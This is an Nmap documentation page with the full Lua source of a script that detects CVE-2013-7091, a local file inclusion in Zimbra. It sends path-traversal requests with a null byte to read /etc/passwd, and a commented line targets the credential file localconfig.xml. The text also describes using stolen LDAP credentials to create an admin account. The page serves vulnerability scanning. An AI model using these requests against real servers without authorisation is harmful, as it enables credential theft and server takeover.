<html><head><style>body {font-family: verdana;font-size: 0.7em;} tr {font-family: verdana;font-size: 0.7em;}</style></head><body>
<h3>File http-vuln-cve2013-7091</h3>
<b>Script types:</b> portrule<br/>
<b>Categories:</b> auth,auth,auth<br/>
<b>Author:</b> Paul AMAR <aos.paul@gmail.com>, Ron Bowes<br/>
<b>License:</b> <a href="https://nmap.org/book/man-legal.html" target=_blank>https://nmap.org/book/man-legal.html</a><br/>
<b>Download:</b> <a href="https://svn.nmap.org/nmap/scripts/http-vuln-cve2013-7091.nse">https://svn.nmap.org/nmap/scripts/http-vuln-cve2013-7091.nse</a><br/>
<h3>Summary</h3>
<p>An 0 day was released on the 6th December 2013 by rubina119, and was patched in Zimbra 7.2.6.</p>
<p>The vulnerability is a local file inclusion that can retrieve any file from the server. Currently, we read /etc/passwd and /dev/null, and compare the lengths to determine vulnerability. TODO: Add the possibility to read compressed file. Then, send some payload to create the new mail account.</p>
<h3>Arguments</h3>
<table>
<tr><td>http-vuln-cve2013-7091.uri:</td><td>URI. Default: /zimbra</td></tr>
<tr><td>slaxml.debug:</td><td>See the documentation for the <a href="nmap/libraries/slaxml.htm">slaxml</a> library</td></tr>
<tr><td>http.host:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.max-body-size:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.max-cache-size:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.pipeline:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.truncated-ok:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.useragent:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>smbdomain:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbhash:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbnoguest:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbpassword:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbtype:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbusername:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>vulns.short:</td><td>See the documentation for the <a href="nmap/libraries/vulns.htm">vulns</a> library</td></tr>
<tr><td>vulns.showall:</td><td>See the documentation for the <a href="nmap/libraries/vulns.htm">vulns</a> library</td></tr>
</table>
<h3>Usage</h3>
<pre>nmap -sV --script http-vuln-cve2013-7091 &lt;target&gt;
nmap -p80 --script http-vuln-cve2013-7091 --script-args http-vuln-cve2013-7091=/ZimBra &lt;target&gt;</pre>
<h3>Output</h3>
<pre>PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-vuln-cve2013-7091:
|   VULNERABLE:
|   Zimbra Local File Inclusion and Disclosure of Credentials
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2013-7091
|     Description:
|       An 0 day was released on the 6th December 2013 by rubina119.
|       The vulnerability is a local file inclusion that can retrieve the credentials of the Zimbra installations etc.
|       Using this script, we can detect if the file is present.
|       If the file is present, we assume that the host might be vulnerable.
|
|       In future version, we&#39;ll extract credentials from the file but it&#39;s not implemented yet and
|       the detection will be accurate.
|
|       TODO:
|       Add the possibility to read compressed file (because we&#39;re only looking if it exists)
|       Then, send some payload to create the new mail account
|     Disclosure date: 2013-12-06
|     Extra information:
|       Proof of Concept:/index.php?-s
|     References:
|_      http://www.exploit-db.com/exploits/30085/</pre>
<h3>Requirements</h3>
<ul>
<li><a href="nmap/libraries/http.htm">http</a></li>
<li><a href="nmap/libraries/shortport.htm">shortport</a></li>
<li><a href="nmap/libraries/stdnse.htm">stdnse</a></li>
<li><a href="nmap/libraries/string.htm">string</a></li>
<li><a href="nmap/libraries/vulns.htm">vulns</a></li>
</ul>
<h3>Code</h3>
<pre>local http = require &quot;http&quot;
local shortport = require &quot;shortport&quot;
local stdnse = require &quot;stdnse&quot;
local string = require &quot;string&quot;
local vulns = require &quot;vulns&quot;

description = [[
An 0 day was released on the 6th December 2013 by rubina119, and was patched in Zimbra 7.2.6.

The vulnerability is a local file inclusion that can retrieve any file from the server.

Currently, we read /etc/passwd and /dev/null, and compare the lengths to determine vulnerability.

TODO:
Add the possibility to read compressed file.
Then, send some payload to create the new mail account.
]]

---
-- @usage
-- nmap -sV --script http-vuln-cve2013-7091 &lt;target&gt;
-- nmap -p80 --script http-vuln-cve2013-7091 --script-args http-vuln-cve2013-7091=/ZimBra &lt;target&gt;
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- | http-vuln-cve2013-7091:
-- |   VULNERABLE:
-- |   Zimbra Local File Inclusion and Disclosure of Credentials
-- |     State: VULNERABLE (Exploitable)
-- |     IDs:  CVE:CVE-2013-7091
-- |     Description:
-- |       An 0 day was released on the 6th December 2013 by rubina119.
-- |       The vulnerability is a local file inclusion that can retrieve the credentials of the Zimbra installations etc.
-- |       Using this script, we can detect if the file is present.
-- |       If the file is present, we assume that the host might be vulnerable.
-- |
-- |       In future version, we&#39;ll extract credentials from the file but it&#39;s not implemented yet and
-- |       the detection will be accurate.
-- |
-- |       TODO:
-- |       Add the possibility to read compressed file (because we&#39;re only looking if it exists)
-- |       Then, send some payload to create the new mail account
-- |     Disclosure date: 2013-12-06
-- |     Extra information:
-- |       Proof of Concept:/index.php?-s
-- |     References:
-- |_      http://www.exploit-db.com/exploits/30085/
--
-- @args http-vuln-cve2013-7091.uri URI. Default: /zimbra
---

author = {&quot;Paul AMAR &lt;aos.paul@gmail.com&gt;&quot;, &quot;Ron Bowes&quot;}
license = &quot;Same as Nmap--See https://nmap.org/book/man-legal.html&quot;
categories = {&quot;exploit&quot;,&quot;vuln&quot;,&quot;intrusive&quot;}

portrule = shortport.http

-- function to escape specific characters
local escape = function(str) return string.gsub(str, &quot;%%&quot;, &quot;%%%%&quot;) end

action = function(host, port)
  local uri = stdnse.get_script_args(SCRIPT_NAME..&quot;.uri&quot;) or &quot;/zimbra&quot;

  local vuln = {
       title = &#39;Zimbra Local File Inclusion (Gather admin credentials)&#39;,
       state = vulns.STATE.NOT_VULN, -- default
       IDS = {CVE = &#39;CVE-2013-7091&#39;},
       description = [[
This script exploits a Local File Inclusion in
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz
which allows us to see any file on the filesystem, including config files
that contain LDAP root credentials, allowing us to make requests in
/service/admin/soap API with the stolen LDAP credentials to create user
with administration privileges and gain access to the Administration Console.

This issue was patched in Zimbra 7.2.6.
]],
       references = {
          &#39;http://www.exploit-db.com/exploits/30085/&#39;,
       },
       dates = {
           disclosure = {year = &#39;2013&#39;, month = &#39;12&#39;, day = &#39;06&#39;},
       },
     }
  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)

  local file_short = &quot;../../../../../../../../../dev/null&quot;
  local file_long = &quot;../../../../../../../../../etc/passwd&quot;
  --local file_long = &quot;../../../../../../../../../opt/zimbra/conf/localconfig.xml&quot;

  local url_short = &quot;/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&amp;skin=&quot; .. file_short .. &quot;%00&quot;
  local url_long = &quot;/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&amp;skin=&quot; .. file_long .. &quot;%00&quot;

  stdnse.debug1(&quot;Trying to detect if the server is vulnerable&quot;)
  stdnse.debug1(&quot;GET &quot; .. uri .. escape(url_short))
  stdnse.debug1(&quot;GET &quot; .. uri .. escape(url_long))

  local session_short = http.get(host, port, uri..url_short)
  local session_long = http.get(host, port, uri..url_long)

  if session_short and session_short.status == 200 and session_long and session_long.status == 200 then
    if session_short.header[&#39;content-type&#39;] == &quot;application/x-javascript&quot; then
      -- Because .gz format is somewhat odd, giving a bit of a margin of error here
      if (string.len(session_long.body) - string.len(session_short.body)) &gt; 100 then
        stdnse.debug1(&quot;The website appears to be vulnerable a local file inclusion vulnerability in Zimbra&quot;)
        vuln.state = vulns.STATE.EXPLOIT
        return vuln_report:make_output(vuln)
      else
        stdnse.debug1(&quot;The host does not appear to be vulnerable&quot;)
        vuln.state = vulns.STATE.NOT_VULN
        return vuln_report:make_output(vuln)
      end
    else
      stdnse.debug1(&quot;Bad content-type for the resource : &quot; .. session_short.header[&#39;content-type&#39;])
      return
    end
  else
      stdnse.debug1(&quot;The website seems to be not vulnerable to this attack.&quot;)
      return
  end
end</pre>
